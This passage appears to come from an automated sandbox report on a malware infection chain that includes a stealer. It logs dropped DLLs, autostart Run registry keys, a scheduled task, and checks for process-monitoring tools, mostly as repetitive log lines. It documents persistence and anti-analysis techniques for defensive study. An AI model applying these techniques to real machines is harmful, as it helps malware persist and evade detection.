Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c9a37ab27e.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2a8f2f9086.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx
Source: C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Ylrdnrwcx

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000004001\12dsvc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000065001\stories.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
